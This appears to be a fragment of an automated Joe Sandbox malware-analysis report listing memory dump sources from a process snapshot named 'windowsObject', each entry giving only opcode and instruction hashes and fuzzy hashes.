          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: dbbc25c3b0a96d3c230404c80465abcdd3ceee7cb1c99be09e909bc6be6371a0
          • Instruction ID: b4dcca13b4151e558f4ad8c93f3549e80c78d30fe6541603b8da25e739df916e
          • Opcode Fuzzy Hash: dbbc25c3b0a96d3c230404c80465abcdd3ceee7cb1c99be09e909bc6be6371a0
          • Instruction Fuzzy Hash: 8B117F3280D17D8AE36CE6B994055F53F60EF813E2F00007DE54D471D3FA157A1AD2A4
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d44c50d389d8b16d2c5e690a03d051b28a591b2145c214b3ed4743b76506f7c9
          • Instruction ID: 1a26a3137189435af56f6de2541a8eedd36f1237d6fd3bfe107ee53c10b50519
          • Opcode Fuzzy Hash: d44c50d389d8b16d2c5e690a03d051b28a591b2145c214b3ed4743b76506f7c9
          • Instruction Fuzzy Hash: 3901E522B1985E0BEB94F67C94915B8BBA2FF88262B44467AC40EC31C7FC1CA855C711
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7289e5870d7d3a57a2c48bcf18ec9d4b0174095ff04f7c621259ce07a9fa6fc2
          • Instruction ID: de9bb912b5dea925aee78ee2d5f05ce1c62c60d1451840f6d06581bc66ecde7a
          • Opcode Fuzzy Hash: 7289e5870d7d3a57a2c48bcf18ec9d4b0174095ff04f7c621259ce07a9fa6fc2
          • Instruction Fuzzy Hash: 2011A56241E7DE0FD796976098914A6BF70EF2221178542FBC0C6C6997F81CAC45C362
          Memory Dump Source
          • Source File: 00000008.00000002.2436795908.00007FFC3DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC3DE40000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_7ffc3de40000_windowsObject.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 66caba6472dbc327ae244a8d4394d1feeec538289109a9d36b6053fd3ccddc73
          • Instruction ID: e8875b8c1283295ca85cbbad5d3ae1a4bab0a0d21e5a2e90535eb9cd078b4955
          • Opcode Fuzzy Hash: 66caba6472dbc327ae244a8d4394d1feeec538289109a9d36b6053fd3ccddc73
          • Instruction Fuzzy Hash: C1F06D34A0855E8FEE98EF14C481AA93BA2FF94304B504170D51887396ED35FD11C760